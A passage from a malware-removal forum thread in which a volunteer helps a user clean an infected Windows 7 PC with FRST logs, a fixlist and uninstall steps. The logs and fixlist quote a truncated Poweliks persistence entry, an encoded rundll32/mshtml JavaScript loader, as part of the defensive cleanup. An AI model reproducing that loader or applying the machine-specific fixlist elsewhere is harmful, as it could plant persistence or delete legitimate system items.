Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Canon MX860 ser Network
Description: Canon MX860 ser Network
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: Canon
Service: StillCam
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/23/2014 09:06:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000c01e2
Faulting process id: 0x1734
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 09:01:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002301e2
Faulting process id: 0x2150
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:54:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000901e2
Faulting process id: 0xb28
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:48:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002301e2
Faulting process id: 0x1ac8
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:43:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002301e2
Faulting process id: 0xc3c
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:37:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002301e2
Faulting process id: 0x1190
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:31:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000f01e2
Faulting process id: 0x2660
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 08:26:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000d01e2
Faulting process id: 0x16f0
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/23/2014 00:34:53 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x612c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/22/2014 08:57:43 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17344 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 23fc

Start Time: 01cfedfd01e4b6f4

Termination Time: 35

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:


System errors:
=============
Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.

Error: (10/24/2014 07:33:51 PM) (Source: atapi) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Ide\IdePort0.


Microsoft Office Sessions:
=========================
Error: (10/23/2014 09:06:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000c01e2173401cfef2f22d19544C:\windows\system32\dllhost.exeunknown62ebd526-5b22-11e4-b115-4487fc943a34

Error: (10/23/2014 09:01:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002301e2215001cfef2e6d527987C:\windows\system32\dllhost.exeunknownac5be513-5b21-11e4-b115-4487fc943a34

Error: (10/23/2014 08:54:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000901e2b2801cfef2d6618ca1dC:\windows\system32\dllhost.exeunknowna724207d-5b20-11e4-b115-4487fc943a34

Error: (10/23/2014 08:48:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002301e21ac801cfef2c8f2e33d2C:\windows\system32\dllhost.exeunknownce7ac2d9-5b1f-11e4-b115-4487fc943a34

Error: (10/23/2014 08:43:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002301e2c3c01cfef2bd8d3548aC:\windows\system32\dllhost.exeunknown17c651f6-5b1f-11e4-b115-4487fc943a34

Error: (10/23/2014 08:37:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002301e2119001cfef2b21bab014C:\windows\system32\dllhost.exeunknown61502f2d-5b1e-11e4-b115-4487fc943a34

Error: (10/23/2014 08:31:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000f01e2266001cfef2a3b8fcb57C:\windows\system32\dllhost.exeunknown7c16d73b-5b1d-11e4-b115-4487fc943a34

Error: (10/23/2014 08:26:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000d01e216f001cfef298485db0cC:\windows\system32\dllhost.exeunknownc4681bbb-5b1c-11e4-b115-4487fc943a34

Error: (10/23/2014 00:34:53 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf612c01cfeee6eedf8406C:\Program Files\Internet Explorer\iexplore.exeC:\windows\system32\MSHTML.dlle56d2d56-5ada-11e4-818b-4487fc943a34

Error: (10/22/2014 08:57:43 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe11.0.9600.1734423fc01cfedfd01e4b6f435C:\Program Files\Internet Explorer\iexplore.exe


CodeIntegrity Errors:
===================================
  Date: 2014-08-01 14:14:55.147
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCDFF3.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-08-01 14:14:55.147
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCDFF3.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-08-01 14:14:55.147
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCDFF3.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-08-01 14:14:55.137
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCDFF3.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-25 16:50:12.937
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSC24DE.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-25 16:50:12.921
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSC24DE.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-25 16:50:12.921
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSC24DE.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-05-25 16:50:12.921
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSC24DE.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-04-16 05:55:41.917
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCB6D0.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-04-16 05:55:41.907
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Mcafee\VSCore_3_8\VSCB6D0.tmp\vscore\mfeelamk.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: AMD Athlon™ II X2 215 Processor
Percentage of memory in use: 69%
Total physical RAM: 2814.04 MB
Available physical RAM: 864.89 MB
Total Pagefile: 5626.38 MB
Available Pagefile: 2745.5 MB
Total Virtual: 2047.88 MB
Available Virtual: 1903.3 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:440.59 GB) (Free:392.1 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: E3832A6E)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=440.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=25.1 GB) - (Type=12)

==================== End Of Log ============================



#4 Gunto

Gunto

    Bleepin' Reject Phoenix


  • Malware Response Team
  • 1,291 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA
  • Local time:06:59 AM

Posted 25 October 2014 - 02:58 AM

Hi,

 

Alright, thanks for the logs! Now then, let's get to work. :)

 

Farbar Recovery Scan Tool

I need you to run a fix with FRST.

  • Open up Notepad, and copy and paste the text in the following box into the Notepad text field:
    HKLM\...\Run: [] => [X]
    HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
    SearchScopes: HKLM - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
    SearchScopes: HKLM - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&nhttp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-73377=77fd5205&searchfor={searchTerms}
    SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = 71DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
    SearchScopes: HKCU - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
    BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
    Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
    FF Plugin: @microsoft.com/GENUINE -> disabled No File
    S3 SophosVirusRemovalTool; C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe [X]
    S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
    S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
    S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
    C:\Users\Jude\Documents\SpyHunter-Installer.exe
    C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
    C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46}
    C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E}
    C:\ProgramData\flashax10.exe
    C:\Users\Jude\gotomypc_540.exe
    C:\Users\Jude\AppData\Local\Temp\catchme.dll
    C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll
    C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll
    C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe
    C:\Users\Jude\AppData\Local\Temp\MSN407.exe
    C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe
    C:\Users\Jude\AppData\Local\Temp\Quarantine.exe
    C:\Users\Jude\AppData\Local\Temp\Refresh.exe
    C:\Users\Jude\AppData\Local\Temp\SHSetup.exe
    C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe
    C:\Users\Jude\AppData\Local\Temp\sqlite3.dll
    C:\Users\Jude\AppData\Local\Temp\sqlite3.exe
    C:\Users\Jude\AppData\Local\Temp\vxocslb.dll
    C:\Users\Jude\AppData\Local\Temp\_is7D79.exe
    CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{56CBD3CF-BF99-4DF5-851F-F5B9B57496A1}\InprocServer32 -> C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll (Microsoft)
    CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
    S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys
    C:\windows\system32\drivers\hitmanpro37.sys
    C:\ProgramData\Sophos
    C:\ProgramData\HitmanPro
    AlternateDataStreams: C:\Users\Jude\Documents\Grandpa Frank's picture.eml:OECustomProperty
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SophosVirusRemovalTool => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SophosVirusRemovalTool => ""="Service"
    Save it to the same location as FRST as fixlist.txt.
  • Open up FRST, and click the Fix button. If it asks you to reboot in order to complete the fix, please do so.
  • Once it's done fixing things, it will create fixlog.txt in the same folder. Please copy and paste it into your reply.

Uninstall Programs

 

Next, I'll need you to uninstall a few programs. But before you do, I need to ask; do you use the following programs? If not, please remove them as per the below instructions:

 

Adobe Reader XI (11.0.09) (perfectly legitimate, but commonly targeted by malware, so it's best to get rid if it if you don't need it)

ESET Online Scanner v3 (once you use it once, you shouldn't need it again)

Java 7 Update 71 (also legit, but this is outdated, and Java (especially older versions) are also frequently targeted by malware, so it's good to not have it if you don't need it. I will have you install the latest version later if you do need it)

LTCM Client (I've heard some bad things about this one, so I advise you to get rid of it)

Windows Live Messenger (Microsoft stopped supporting this quite a while ago, and since you have Skype, there really isn't any reason for you to have it)

 

I need you to uninstall some programs using either Programs and Features or Revo Uninstaller.

If you want to use Programs and Features:

  • Go to Start > Control Panel > Programs and Features.
  • Once it loads all the programs, uninstall the following, if present, one at a time:
    Adobe Reader XI (11.0.09)

    Avast Free Antivirus

    Coupon Printer for Windows

    ESET Online Scanner v3

    Java 7 Update 71

    LTCM Client

    SpyHunter

    Windows Live Messenger
    by clicking Change/Remove, and following the prompts in the uninstaller.

If you have any problems uninstalling a program using Programs and Features, proceed to the below method.

If you want to use Revo Uninstaller (which cleans up a bit better):

  • Download Revo from here, and save it to your desktop.
  • Double click the installer on your desktop, and let the program install.
  • Once it's done, double click the Revo Uninstaller shortcut on your desktop to run it. Once it loads all the programs, uninstall the following, if present, one at a time:
    Adobe Reader XI (11.0.09)

    Avast Free Antivirus

    Coupon Printer for Windows

    ESET Online Scanner v3

    Java 7 Update 71

    LTCM Client

    SpyHunter

    Windows Live Messenger

  • Double click the program, and say Yes on the prompt. Ensure the Moderate option is ticked, and click Next.
  • Follow the prompts in the built-in uninstaller, and then click Next in Revo.
  • If any registry remnants are found, check the bold items only. If there is a closed folder visible, click the + to expand it until you find the bold item. Then Delete the remnants.
  • Proceed again, and if any files/folders were found, delete those, too.

Finally, I'd like you to rerun a FRST scan to get a fresh look at your system. You will only have one text file to copy and paste this time. Also, how's your PC running now? :)

 

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...


#5 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:59 AM

Posted 26 October 2014 - 10:10 PM

As an update to this issue, I was able to remove a Trojan on Friday night running a McAfee antivirus scan.  The PC has not exhibited the issues I initially described since Friday night.  I'm not sure which file you needed from the latest FRST scan I ran, so I've pasted both here.  Could you please take a look and let me know if anything looks suspicious?  I appreciate your assistance offered for this issue.  I removed all the programs you suggested except for Adobe Acrobat Reader version 11, which I use quite frequently.

 

FRST scan results 10/26/2014:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 26-10-2014
Ran by Jude (administrator) on GERSTNER-PC on 26-10-2014 21:56:48
Running from C:\Users\Jude\Documents
Loaded Profile: Jude (Available profiles: Jude)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\EpsonCustomerParticipation\EPCP.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Lenovo (Shenzhen) Electronic Co., Ltd.) C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Lenovo) C:\Program Files\Lenovo\HealthCare\HealthCare.exe
(CyberLink) C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Epson Software\Event Manager\EEventManager.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\w32x86\3\E_FATIHQA.EXE
(Skype Technologies S.A.) C:\Program Files\Skype\Phone\Skype.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2mainh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2host.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2audioh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2printh.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
(McAfee, Inc.) C:\Program Files\McAfee\VirusScan\mcods.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\Core\mchost.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [LenovoFSC] => C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe [49152 2009-07-29] (Lenovo (Shenzhen) Electronic Co., Ltd.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-07-10] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7830048 2009-10-13] (Realtek Semiconductor)
HKLM\...\Run: [Healthcare] => C:\Program Files\Lenovo\HealthCare\HealthCare.exe [827392 2009-09-28] (Lenovo)
HKLM\...\Run: [CLMLServer] => C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-06-03] (CyberLink)
HKLM\...\Run: [UpdateP2GoShortCut] => C:\Program Files\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM\...\Run: [IdeaNotesUser] => C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe [221872 2009-08-24] (Digital Delivery Networks, Inc.)
HKLM\...\Run: [EEventManager] => C:\Program Files\Epson Software\Event Manager\EEventManager.exe [979328 2010-10-12] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [EPSON Artisan 730 Series] => C:\windows\system32\spool\DRIVERS\W32X86\3\E_FATIHQA.EXE [212480 2011-01-20] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [21444224 2014-05-08] (Skype Technologies S.A.)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x776496073BEDCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKLM - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
